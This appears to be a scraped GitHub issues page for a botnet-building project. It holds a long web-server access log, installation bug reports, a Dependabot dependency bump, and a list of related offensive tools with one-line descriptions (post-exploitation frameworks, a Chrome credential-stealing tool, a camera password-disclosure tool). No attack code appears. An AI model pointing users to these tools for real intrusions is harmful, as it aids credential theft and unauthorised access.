08:41:48] "GET /assets/js/daterangepicker/daterangepicker.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:48] "GET /assets/js/jquery.multi-select.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:48] "GET /assets/js/icheck/icheck.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:48] "GET /assets/js/neon-chat.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:48] "GET /assets/js/neon-custom.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:48] "GET /assets/js/jquery-ui/js/jquery-ui-1.10.3.minimal.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:48] "GET /assets/js/jvectormap/jquery-jvectormap-1.2.2.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:48] "GET /assets/js/rickshaw/rickshaw.min.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:48] "GET /assets/js/neon-api.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:48] "GET /assets/js/jvectormap/jquery-jvectormap-1.2.2.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:48] "GET /assets/js/jvectormap/jquery-jvectormap-world-mill-en.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:48] "GET /assets/js/jquery.sparkline.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:48] "GET /assets/js/rickshaw/vendor/d3.v3.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:48] "GET /assets/js/rickshaw/rickshaw.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:48] "GET /assets/js/raphael-min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:48] "GET /assets/js/morris.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:48] "GET /assets/js/custom/canvas-login.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:48] "GET /assets/js/toastr.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:48] "GET /assets/images/discord.png HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:48] "GET /assets/js/neon-demo.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:48] "GET /assets/images/byob_favicon_round-15.png HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:51] "GET /sessions HTTP/1.1" 200 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/js/jquery-ui/css/no-theme/jquery-ui-1.10.3.custom.min.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/css/font-icons/entypo/css/entypo.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/css/bootstrap.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/css/neon-core.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/css/neon-theme.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/css/neon-forms.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/css/custom.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/js/jquery-1.11.3.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/js/datatables/datatables.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/js/select2/select2-bootstrap.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/js/select2/select2.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/js/selectboxit/jquery.selectBoxIt.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/js/jquery-ui/js/jquery-ui-1.10.3.minimal.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/js/gsap/TweenMax.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/js/bootstrap.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/js/joinable.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/js/resizeable.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/js/neon-api.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/css/font-icons/entypo/font/entypo.woff?71205724 HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/profile_pics/default_profile.jpg HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/fonts/TitilliumWeb-Light.ttf HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/images/byob_logo-12.png HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/js/datatables/datatables.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/js/selectboxit/jquery.selectBoxIt.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/js/neon-chat.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/js/neon-custom.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/js/select2/select2.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/js/daterangepicker/daterangepicker-bs3.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/js/icheck/skins/minimal/_all.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/js/icheck/skins/square/_all.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/js/icheck/skins/flat/_all.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/js/icheck/skins/polaris/polaris.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/js/icheck/skins/futurico/futurico.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/js/bootstrap-tagsinput.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/js/typeahead.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/js/bootstrap-datepicker.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/js/bootstrap-timepicker.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/js/bootstrap-colorpicker.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/js/moment.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/js/daterangepicker/daterangepicker.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/js/jquery.multi-select.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/js/icheck/icheck.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/js/rickshaw/vendor/d3.v3.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/js/rickshaw/rickshaw.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/js/raphael-min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/js/jquery.peity.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/js/morris.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/js/jvectormap/jquery-jvectormap-1.2.2.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/js/rickshaw/rickshaw.min.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:52] "GET /assets/js/jvectormap/jquery-jvectormap-1.2.2.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:53] "GET /assets/js/jvectormap/jquery-jvectormap-world-mill-en.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:53] "GET /assets/js/jquery.sparkline.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:53] "GET /assets/js/custom/canvas-login.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:41:53] "GET /assets/js/toastr.js HTTP/1.1" 304 -

    bug 
    opened by RZSrzTeam 1
  • pip subprocess to install build dependencies did not run successfully.

    pip subprocess to install build dependencies did not run successfully.

    when i run startup.sh when it get to installing build dependencies it loads a bit and then give me a 883 line error and says pip subprocess to install build dependencies did not run successfully. │ exit code: 1 what should i do

    bug 
    opened by arad-top-g 0
  • ModuleNotFoundError: No module named 'flask'

    ModuleNotFoundError: No module named 'flask'

    OS: ubuntu 22.04 LTS I do: python3 run.py and then i get this:

    error: Traceback (most recent call last): File "/home/lakaka/byob/web-gui/run.py", line 1, in from buildyourownbotnet import create_app File "/home/lakaka/byob/web-gui/buildyourownbotnet/init.py", line 2, in from flask import Flask ModuleNotFoundError: No module named 'flask'

    bug 
    opened by ArabicCat 0
  • Bump qs from 6.5.2 to 6.5.3 in /web-gui/buildyourownbotnet/assets/js/jquery-terminal

    Bump qs from 6.5.2 to 6.5.3 in /web-gui/buildyourownbotnet/assets/js/jquery-terminal

    Bumps qs from 6.5.2 to 6.5.3.

    Changelog

    Sourced from qs's changelog.

    6.5.3

    • [Fix] parse: ignore __proto__ keys (#428)
    • [Fix] utils.merge: avoid a crash with a null target and a truthy non-array source
    • [Fix] correctly parse nested arrays
    • [Fix] stringify: fix a crash with strictNullHandling and a custom filter/serializeDate (#279)
    • [Fix] utils: merge: fix crash when source is a truthy primitive & no options are provided
    • [Fix] when parseArrays is false, properly handle keys ending in []
    • [Fix] fix for an impossible situation: when the formatter is called with a non-string value
    • [Fix] utils.merge: avoid a crash with a null target and an array source
    • [Refactor] utils: reduce observable [[Get]]s
    • [Refactor] use cached Array.isArray
    • [Refactor] stringify: Avoid arr = arr.concat(...), push to the existing instance (#269)
    • [Refactor] parse: only need to reassign the var once
    • [Robustness] stringify: avoid relying on a global undefined (#427)
    • [readme] remove travis badge; add github actions/codecov badges; update URLs
    • [Docs] Clean up license text so it’s properly detected as BSD-3-Clause
    • [Docs] Clarify the need for "arrayLimit" option
    • [meta] fix README.md (#399)
    • [meta] add FUNDING.yml
    • [actions] backport actions from main
    • [Tests] always use String(x) over x.toString()
    • [Tests] remove nonexistent tape option
    • [Dev Deps] backport from main
    Commits
    • 298bfa5 v6.5.3
    • ed0f5dc [Fix] parse: ignore __proto__ keys (#428)
    • 691e739 [Robustness] stringify: avoid relying on a global undefined (#427)
    • 1072d57 [readme] remove travis badge; add github actions/codecov badges; update URLs
    • 12ac1c4 [meta] fix README.md (#399)
    • 0338716 [actions] backport actions from main
    • 5639c20 Clean up license text so it’s properly detected as BSD-3-Clause
    • 51b8a0b add FUNDING.yml
    • 45f6759 [Fix] fix for an impossible situation: when the formatter is called with a no...
    • f814a7f [Dev Deps] backport from main
    • Additional commits viewable in compare view

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    • @dependabot use these labels will set the current labels as the default for future PRs for this repo and language
    • @dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language
    • @dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language
    • @dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

    You can disable automated security fix PRs for this repo from the Security Alerts page.

    dependencies javascript 
    opened by dependabot[bot] 0
Owner
dvm
Computer science student
dvm
Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python

Pupy Installation Installation instructions are on the wiki, in addition to all other documentation. For maximum compatibility, it is recommended to u

null 7.4k Jan 4, 2023
A windows post exploitation tool that contains a lot of features for information gathering and more.

Crowbar - A windows post exploitation tool Status - ✔️ This project is now considered finished. Any updates from now on will most likely be new script

null 29 Nov 20, 2022
Chrome Post-Exploitation is a client-server Chrome exploit to remotely allow an attacker access to Chrome passwords, downloads, history, and more.

ChromePE [Linux/Windows] Chrome Post-Exploitation is a client-server Chrome exploit to remotely allow an attacker access to Chrome passwords, download

Finn Lancaster 3 Oct 5, 2022
Crowbar - A windows post exploitation tool

Crowbar - A windows post exploitation tool Status - ✔️ This project is now considered finished. Any updates from now on will most likely be new script

null 29 Nov 20, 2022
Proof-of-concept obfuscation toolkit for C# post-exploitation tools

InvisibilityCloak Proof-of-concept obfuscation toolkit for C# post-exploitation tools. This will perform the below actions for a C# visual studio proj

null 259 Dec 19, 2022
A collection of intelligence about Log4Shell and its exploitation activity

Log4Shell-IOCs Members of the Curated Intelligence Trust Group have compiled a list of IOC feeds and threat reports focused on the recent Log4Shell ex

Curated Intel 172 Nov 17, 2022
Salesforce Recon and Exploitation Toolkit

Salesforce Recon and Exploitation Toolkit Salesforce Recon and Exploitation Toolkit Usage python3 main.py <URL> References Announcement Blog - https:/

null 81 Dec 23, 2022
VPN Overall Reconnaissance, Testing, Enumeration and eXploitation Toolkit

Vortex VPN Overall Reconnaissance, Testing, Enumeration and Exploitation Toolkit Overview A very simple Python framework, inspired by SprayingToolkit,

null 315 Dec 28, 2022
CamOver is a camera exploitation tool that allows to disclosure network camera admin password.

CamOver is a camera exploitation tool that allows to disclosure network camera admin password. Features Exploits vulnerabilities in most popul

EntySec 247 Jan 2, 2023
SSRF search vulnerabilities exploitation extended.

This tool search for SSRF using predefined settings in different parts of a request (path, host, headers, post and get parameters).

Andri Wahyudi 13 Jul 4, 2021
Vulnerability Exploitation Code Collection Repository

Introduction expbox is an exploit code collection repository List CVE-2021-41349 Exchange XSS PoC <= Exchange 2013 update 23 <= Exchange 2016 update 2

0x0021h 263 Feb 14, 2022
neo Tool is great one in binary exploitation topic

neo Tool is great one in binary exploitation topic. instead of doing several missions by many tools and windows, you can now automate this in one tool in one session.. Enjoy it

Hamza Elansari 4 Oct 10, 2022
An interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers.

mitmproxy mitmproxy is an interactive, SSL/TLS-capable intercepting proxy with a console interface for HTTP/1, HTTP/2, and WebSockets. mitmdump is the

mitmproxy 29.7k Jan 4, 2023
Fuzz introspector is a tool to help fuzzer developers to get an understanding of their fuzzer’s performance and identify any potential blockers.

Fuzz introspector Fuzz introspector is a tool to help fuzzer developers to get an understanding of their fuzzer’s performance and identify any potenti

Open Source Security Foundation (OpenSSF) 221 Jan 1, 2023
Dependency Combobulator is an Open-Source, modular and extensible framework to detect and prevent dependency confusion leakage and potential attacks.

Dependency Combobulator Dependency Combobulator is an Open-Source, modular and extensible framework to detect and prevent dependency confusion leakage

Apiiro 84 Dec 23, 2022
Open Source Intelligence gathering tool aimed at reducing the time spent harvesting information from open sources.

The Recon-ng Framework Recon-ng content now available on Pluralsight! Recon-ng is a full-featured reconnaissance framework designed with the goal of p

null 2.4k Jan 7, 2023
🔍 IRIS: An open-source intelligence framework

IRIS is an open-source OSINT framework, consisting of modules to find information about a target by scraping sites and fetching data from APIs.

IRIS 79 Dec 20, 2022
log4j2 passive burp rce scanning tool get post cookie full parameter recognition

log4j2_burp_scan 自用脚本log4j2 被动 burp rce扫描工具 get post cookie 全参数识别,在ceye.io api速率限制下,最大线程扫描每一个参数,记录过滤已检测地址,重复地址 token替换为你自己的http://ceye.io/ token 和域名地址

null 5 Dec 10, 2021